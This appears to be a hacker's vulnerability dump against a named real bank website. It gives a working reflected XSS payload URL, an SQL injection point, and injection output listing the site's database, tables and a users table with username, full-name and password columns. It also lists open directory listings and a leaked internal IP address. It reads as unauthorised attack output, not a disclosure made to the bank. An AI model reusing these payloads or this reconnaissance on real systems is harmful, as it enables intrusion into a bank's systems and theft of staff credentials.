- **********************************************************************************************
- [*] Target: www.islamibankbd.com
- [**] Cross-site Scripting:
- http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
- (works on Mozilla Firefox)
- [**] SQL injection:
- http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
- [****] Information Leaked from their database:
- database: MySQL
- [*] Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
- available databases [2]:
- [*] information_schema
- [*] islamidb
- Database: islamidb
- [74 tables]
- Database: islamidb
- Table: users
- [13 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | Address | varchar(50) |
- | BranchName | varchar(50) |
- | Depertment | varchar(50) |
- | Designation | varchar(50) |
- | Email | varchar(50) |
- | FullName | varchar(50) |
- | IsActive | tinyint(4) |
- | Mobile | varchar(50) |
- | Password | varchar(255) |
- | Phone | varchar(50) |
- | UserID | int(11) |
- | UserName | varchar(50) |
- | UserType | char(1) |
- +-------------+--------------+
- Database: islamidb
- Table: users
- [42 entries]
- +------------------+
- | UserName |
- +------------------+
- Database: islamidb
- Table: users
- [42 entries]
- +-------------------------------+
- | FullName |
- +-------------------------------+
- Database: islamidb
- Table: users
- [42 entries]
- +----------------------------------+
- | Password |
- +----------------------------------+
- [**] Directory Listing Enabled:
- Directory listings give attackers a better understanding of the server and application structure. In some situations a directory listing may reveal resources that are not supposed to be known.
- [-] Solution: Disable directory listings.
- url: http://www.islamibankbd.com/upload_dir/photo_album/
- url: http://www.islamibankbd.com/upload_dir/newsimages/
- url: http://www.islamibankbd.com/feedback/
- url: http://www.islamibankbd.com/upload_dir/photo_album/thumb/
- url: http://www.islamibankbd.com/upload_dir/fex_graph/
- url: http://www.islamibankbd.com/upload_dir/fex_graph/sym00/
- url: http://www.islamibankbd.com/feedback/images/
- [**] IP Disclosure:
- The server or application disclosed internal network information. This information could be used by attackers to make an educated guess about the internal or external network topology. Leaked IP addresses could be used as a stepping-stone to more complex attacks.
- [-] Solution: Ensure that sensitive information such as internal or external IP addresses is safely guarded. Unless there is a good reason to expose it, prevent the disclosure of network information.
- ip: 192.168.0.69
- [**] Email leaked:
- [****] Picture:
- http://www.imagup.com/data/1166122796.html